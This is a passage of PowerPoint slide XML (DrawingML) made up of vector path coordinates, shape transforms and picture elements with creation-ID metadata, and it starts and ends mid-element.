                    <a:pt x="546312" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569598" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569598" y="65003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590710" y="65003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617491" y="47934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569598" y="47934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569598" y="21193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619048" y="21193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616089" y="15463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613305" y="12395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606620" y="8026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603146" y="6543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595241" y="4551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590405" y="4063"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="619048" y="21193"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="585142" y="21193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587500" y="21722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591767" y="23428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593352" y="24709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596115" y="28366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596786" y="30561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596786" y="35681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580245" y="47934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617491" y="47934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620173" y="40578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620885" y="36636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620885" y="27370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620042" y="23428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619930" y="22900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619048" y="21193"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="684830" y="2296"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674142" y="2296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667803" y="3393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638055" y="29850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634844" y="42184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634844" y="57017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656688" y="91236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674244" y="96194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685501" y="96194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689057" y="95971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693532" y="95199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693720" y="95199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="88412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="78719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681782" y="78719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679151" y="78292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678970" y="78292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672720" y="76342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659065" y="55046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659065" y="43992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681335" y="19791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="19791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="9834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688264" y="2519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684830" y="2296"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="712953" y="66812"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="710514" y="66812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709437" y="67787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708035" y="68925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704642" y="71587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702793" y="72826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700802" y="74005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698285" y="75529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695905" y="76606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690357" y="78292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687553" y="78719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="78719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="66812"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="712953" y="19791"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="687553" y="19791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690867" y="20299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690572" y="20299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710340" y="31800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="31800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="19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1" name="object 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06EC17D4-E694-C144-0ACD-AAD00ED0C75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74089" y="3025203"/>
              <a:ext cx="603836" cy="252008"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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8D3A613B-F634-182C-9B9C-DCD248F7163C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3734435" y="3297999"/>
              <a:ext cx="3444875" cy="212090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3444875" h="212089">
                  <a:moveTo>
                    <a:pt x="908392" y="123444"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1625" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="12090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906741" y="135534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908392" y="123444"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3444875" h="212089">
                  <a:moveTo>
                    <a:pt x="1636052" y="121881"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1320596" y="120357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1320533" y="132549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1636001" y="134073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1636052" y="121881"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3444875" h="212089">
                  <a:moveTo>
                    <a:pt x="3444341" y="199669"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2909430" y="121945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2907677" y="134010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3442589" y="211734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3444341" y="199669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3" name="object 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C70B7F2-91D0-D2E6-07AE-06FD058E991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96636" y="2932199"/>
              <a:ext cx="527293" cy="990598"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="object 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A73BB6-F323-045D-C2A4-F065567F8F6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49382" y="2787433"/>
              <a:ext cx="242574" cy="216386"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="object 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02D23435-2E57-BFFD-EB65-0482FA1402F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91534" y="2530371"/>
              <a:ext cx="654390" cy="955040"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="object 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8BA5B55-4F3C-315D-9C34-5811A46DBD8D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25048" y="2760753"/>
              <a:ext cx="694928" cy="790950"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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410249C1-5F1A-67C6-E558-847DBB6EF703}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2624286" y="2759961"/>
              <a:ext cx="696595" cy="793115"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="236976" y="713383"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="137156" y="731672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137156" y="750381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262823" y="792527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271189" y="791019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263127" y="791019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140316" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138287" y="749284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138162" y="749111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138061" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="732307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142148" y="732307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="714654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="713383"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="562343" y="737005"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="262599" y="791019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271189" y="791019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="738278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="737005"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="138162" y="749111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138162" y="749111"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="138680" y="749284"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140316" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749284"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="138680" y="749111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138162" y="749111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749111"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="562343" y="722181"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562877" y="737005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="737005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562851" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="722181"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="563867" y="737005"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562877" y="737005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="737005"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="138680" y="732307"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138061" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="732307"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="142148" y="732307"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138680" y="732307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138061" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142148" y="732307"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="562343" y="721639"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="722181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562851" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="721639"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="563867" y="721639"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="721639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562725" y="722181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562851" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="721639"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="441195" y="678233"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="436558" y="678233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="722181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="721639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="721639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="721098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441195" y="678233"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="238500" y="675157"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="236976" y="675157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237870" y="675909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="676068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237502" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="675157"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="238500" y="713383"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="237502" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="713383"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="668340" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="117499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="702345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27598" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26790" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35779" y="711787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27714" y="711787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044" y="701116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5170" y="118139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668183" y="1580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672401" y="1580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668340" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="238500" y="674243"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="27057" y="711787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35779" y="711787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="676068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="675157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="675157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="674243"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="1044" y="701116"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044" y="701116"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="1523" y="701308"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701308"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="1523" y="701116"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1044" y="701116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701116"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="694928" y="592984"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="411470" y="643276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411470" y="683722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415789" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412070" y="682036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="681833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412364" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="643916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416602" y="643916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="594264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="592984"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="412994" y="681833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412070" y="682036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="681833"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="436666" y="676651"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412994" y="681833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415789" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436558" y="678233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441195" y="678233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436666" y="676651"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="236976" y="675157"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="236976" y="676068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237870" y="675909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="675157"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="412994" y="643916"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412364" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="643916"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="416602" y="643916"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412994" y="643916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412364" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416602" y="643916"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="694928" y="11981"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695464" y="592984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="592984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695416" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11981"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="696452" y="592984"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="695464" y="592984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="592984"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="1523" y="118139"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="893" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118139"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="5170" y="118139"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5170" y="118139"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="694928" y="11460"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695416" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11460"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="696452" y="11460"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695416" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="11460"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="672401" y="1580"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="668183" y="1580"/>
                  </a:lnTo>
                  <a:lnTo>
